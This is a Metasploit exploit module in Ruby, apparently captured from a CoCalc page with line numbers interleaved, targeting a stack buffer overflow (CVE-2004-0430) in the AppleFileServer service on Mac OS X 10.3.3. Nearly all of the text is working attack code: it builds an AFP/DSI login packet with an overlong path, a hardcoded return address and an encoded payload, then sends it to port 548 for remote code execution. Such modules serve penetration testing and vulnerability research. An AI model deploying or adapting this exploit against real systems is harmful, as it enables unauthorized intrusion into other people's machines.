CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'AppleFileServer LoginExt PathName Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in the AppleFileServer service
16
        on MacOS X. This vulnerability was originally reported by Atstake and
17
        was actually one of the few useful advisories ever published by that
18
        company. You only have one chance to exploit this bug.
19
        This particular exploit uses a stack-based return address that will
20
        only work under optimal conditions.
21
      },
22
      'Author'         => 'hdm',
23
      'License'        => MSF_LICENSE,
24
      'References'     =>
25
        [
26
          [ 'CVE', '2004-0430'],
27
          [ 'OSVDB', '5762'],
28
          [ 'BID', '10271'],
29
        ],
30
      'Payload'        =>
31
        {
32
          'Space'    => 512,
33
          'BadChars' => "\x00\x20",
34
          'MinNops'  => 128,
35
          'Compat'   =>
36
            {
37
              'ConnectionType' => "+find"
38
            }
39
        },
40
      'Platform'       => %w{ osx },
41
      'Targets'        =>
42
        [
43
          # Target 0
44
          [
45
            'Mac OS X 10.3.3',
46
            {
47
              'Platform' => 'osx',
48
              'Arch'     => ARCH_PPC,
49
              'Ret'      => 0xf0101c0c # stack address :<
50
            },
51
          ],
52
        ],
53
      'DisclosureDate' => '2004-05-03'))
54

55
    # Configure the default port to be AFP
56
    register_options(
57
      [
58
        Opt::RPORT(548),
59
      ])
60
  end
61

62
  def exploit
63
    connect
64

65
    print_status("Trying target #{target.name}...")
66

67
    path          = "\xff" * 1024
68
    path[168, 4]  = Rex::Arch.pack_addr(target.arch, target.ret)
69
    path[172, payload.encoded.length] = payload.encoded
70

71
    # The AFP header
72
    afp = "\x3f\x00\x00\x00"
73

74
    # Add the authentication methods
75
    ["AFP3.1", "Cleartxt Passwrd"].each { |m|
76
      afp << [m.length].pack('C') + m
77
    }
78

79
    # Add the user type and afp path
80
    afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)
81
    afp << "\x03" + [path.length].pack('n') + path
82

83
    # Add the data stream interface header
84
    dsi =
85
    [
86
      0,           # Flags
87
      2,           # Command
88
      rand(65536), # XID
89
      0,           # Data Offset
90
      afp.length,  # Data Length
91
      0            # Reserved
92
    ].pack("CCnNNN") + afp
93

94
    sock.put(dsi)
95

96
    handler
97

98
    disconnect
99
  end
100
end
101

102